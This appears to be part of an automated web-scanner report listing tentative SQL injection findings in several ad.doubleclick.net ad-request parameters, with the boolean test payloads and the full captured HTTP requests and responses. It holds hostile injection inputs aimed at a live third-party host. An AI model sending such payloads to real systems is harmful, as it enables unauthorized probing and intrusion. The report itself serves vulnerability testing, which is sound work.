1.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [campID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The campID parameter appears to be vulnerable to SQL injection attacks. The payloads 78513079%20or%201%3d1--%20 and 78513079%20or%201%3d2--%20 were each submitted in the campID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=8034078513079%20or%201%3d1--%20&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:28 GMT
Content-Length: 9944

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed May 04 13:42:09 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1620481/tda_activetrader_technology_technology_tradearchitect_ideageneration_tradearchitectoffer_300x250.swf";
var gif = "http://s0.2mdn.net/1620481/tda_activetrader_technology_technology_tradearchitect_ideageneration_tradearchitectoffer_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/3b0/%2a/c%3B240695700%3B0-0%3B0%3B63592959%3B4307-300/250%3B41964175/41981962/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=8034078513079%20or%201%3d1--%20&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=http%3a%2f%2fwww.tdameritrade.com/tradearchitect.html%3Fa%3DSVI%26o%3D201%26cid%3DGENRET%3B877237%3B63592959%3B240695700%3B41964175");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var movie
...[SNIP]...

Request 2

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=8034078513079%20or%201%3d2--%20&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:29 GMT
Content-Length: 10034

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed May 04 13:34:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1620481/tda_activetrader_technology_technology_tradearchitect_options_tradearchitectoffer_300x250.swf";
var gif = "http://s0.2mdn.net/1620481/tda_activetrader_technology_technology_tradearchitect_options_tradearchitectoffer_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/3b0/%2a/y%3B240695700%3B1-0%3B0%3B63592959%3B4307-300/250%3B42006613/42024400/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=8034078513079%20or%201%3d2--%20&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=http%3a%2f%2fwww.tdameritrade.com/tradearchitect.html%3Fa%3DSVI%26o%3D201%26cid%3DGENRET%3B877237%3B63592959%3B240695700%3B42006613");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.subst
...[SNIP]...

1.4. http://ad.doubleclick.net/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.287481.RADIUMONE.COM/B5267998.2

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads 16205304'%20or%201%3d1--%20 and 16205304'%20or%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4682.287481.RADIUMONE.COM/B5267998.2;sz=300x250;click=http://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?;ord=1305126159049?16205304'%20or%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2;sz=300x250;click=http://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?;ord=1305126159049?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:44:36 GMT
Content-Length: 5152

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2752994/1-TXU_ClickSwitch_300x250.swf";
var gif = "http://s0.2mdn.net/2752994/1-TXU_ClickSwitch_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/62/%2a/o%3B239320523%3B0-0%3B0%3B62232454%3B4307-300/250%3B40749351/40767138/1%3B%3B%7Esscs%3D%3fhttp://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?http%3a%2f%2fwww.txu.com/residential/promotions/mass/e-saver-12-2011Q1-click-switch-save.aspx%3FPromoCode%3DBNADA1122%26WT.mc_id%3DONLBANeSVR03%26WT.mc_ev%3Dclick");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="http://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/62/%2a/o%3B239320523%3B0-0%3B0%3B62232454%3B4307-300/250%3B40749351/40767138/1%3B%3B%7Esscs%3D%3fhttp://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?"+ct[i]);}else{x=escape(ct[i]);}fv+="&clickTag"+i+"="+x+"&clickTAG"+i+"="+x+"&clicktag"+i+"="+x;}}
fv+='"';
var bgo=(bg=="same as SWF")?"":'<param name="bgcolor" value="#'+bg+'">';
var bge=(bg=="same as SWF")?"":' bgcolor="#'+bg+'"';
function FSWin(){if((openWindow=="false")&&(id=="DCF0"))alert('open
...[SNIP]...

Request 2

GET /adi/N4682.287481.RADIUMONE.COM/B5267998.2;sz=300x250;click=http://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?;ord=1305126159049?16205304'%20or%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2;sz=300x250;click=http://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?;ord=1305126159049?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:44:37 GMT
Content-Length: 5120

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2752994/TXU_Mailbox_300x250.swf";
var gif = "http://s0.2mdn.net/2752994/TXU_Mailbox_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/62/%2a/w%3B239320523%3B1-0%3B0%3B62232454%3B4307-300/250%3B40749405/40767192/1%3B%3B%7Esscs%3D%3fhttp://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?http%3a%2f%2fwww.txu.com/residential/promotions/mass/e-saver-12-2011Q1-save-money.aspx%3FPromoCode%3DBNADA1122%26WT.mc_id%3DONLBANeSVR01%26WT.mc_ev%3Dclick");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="http://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/f/62/%2a/w%3B239320523%3B1-0%3B0%3B62232454%3B4307-300/250%3B40749405/40767192/1%3B%3B%7Esscs%3D%3fhttp://rs.gwallet.com/r1/click/Xu7Y_wGZPQNP_Aio_GEX8hXqOsddIDN_x5XVmTmtbPs/p458b4194r840214445S1d?"+ct[i]);}else{x=escape(ct[i]);}fv+="&clickTag"+i+"="+x+"&clickTAG"+i+"="+x+"&clicktag"+i+"="+x;}}
fv+='"';
var bgo=(bg=="same as SWF")?"":'<param name="bgcolor" value="#'+bg+'">';
var bge=(bg=="same as SWF")?"":' bgcolor="#'+bg+'"';
function FSWin(){if((openWindow=="false")&&(id=="DCF0"))alert('openWindow is wrong.');
...[SNIP]...

1.5. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.2

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000796892/mnum=0000884211/cstr=99211315=_4dcaa461,8861264310,796892%5E884211%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=99211315/optn=64?trg=;ord=8861264310?&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=1029074125&tile=743041020&tug=&site=2&affiliate=20&hcent=892&scent=&pos=113&xpg=4294&sec=&au1=1&au2=1&uri=%2feye-health%2ftc%2fpinkeye-topic-overview&artid=091e9c5e8001e4a7&inst=0&leaf=1160&cc=16&tmg=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:30:23 GMT
Content-Length: 570

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/c/b4/%2a/s;226750343;1-0;0;50154095;2321-160/600;39961085/39978872/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click/site=0000796892/mnum=0000884211/cstr=99211315=_4dcaa461,8861264310,796892%5E884211%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=99211315/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3A2063"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_160x600_Free2011Score.gif" border=0 alt="Advertisement"></a>');

Request 2

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000796892/mnum=0000884211/cstr=99211315=_4dcaa461,8861264310,796892%5E884211%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=99211315/optn=64?trg=;ord=8861264310?&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=1029074125&tile=743041020&tug=&site=2&affiliate=20&hcent=892&scent=&pos=113&xpg=4294&sec=&au1=1&au2=1&uri=%2feye-health%2ftc%2fpinkeye-topic-overview&artid=091e9c5e8001e4a7&inst=0&leaf=1160&cc=16&tmg=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:30:24 GMT
Content-Length: 557

